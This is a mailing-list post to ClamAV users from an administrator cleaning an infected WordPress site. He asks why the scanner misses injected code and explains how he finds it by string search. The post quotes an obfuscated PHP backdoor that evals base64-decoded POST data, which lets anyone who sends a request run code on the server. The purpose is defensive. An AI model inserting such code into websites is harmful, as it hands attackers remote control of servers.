[clamav-users] basic malware missed???
Steve Holdoway
steve at greengecko.co.nz
Tue Mar 24 21:40:52 UTC 2015
Hi folks,
I'm in the process of cleaning up an infected wordpress website and am
finding a number of files that contain
<?php
$sF="PCT4BA6ODSE_";
$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>
Inserted at the top of the file.
Surely this is something pretty simple to catch?
I'm scanning the docroot nightly, and freshclam is up to date... output
from a just-run freshclam:
# freshclam
ClamAV update process started at Wed Mar 25 08:38:55 2015
main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60,
builder: neo)
Downloading daily-20233.cdiff [100%]
Downloading daily-20234.cdiff [100%]
daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder:
jesler)
bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63,
builder: dgoddard)
Database updated (3781751 signatures) from db.au.clamav.net (IP:
117.104.160.194)
I'm finding them by searching for the string "PCT4BA6ODSE".
Shouldn't this be in there already? If there is a process to add this
can someone please point me to the docs?
Thanks,
Steve
--
Steve Holdoway BSc(Hons) MIITP
http://www.greengecko.co.nz
Linkedin: http://www.linkedin.com/in/steveholdoway
Skype: sholdowa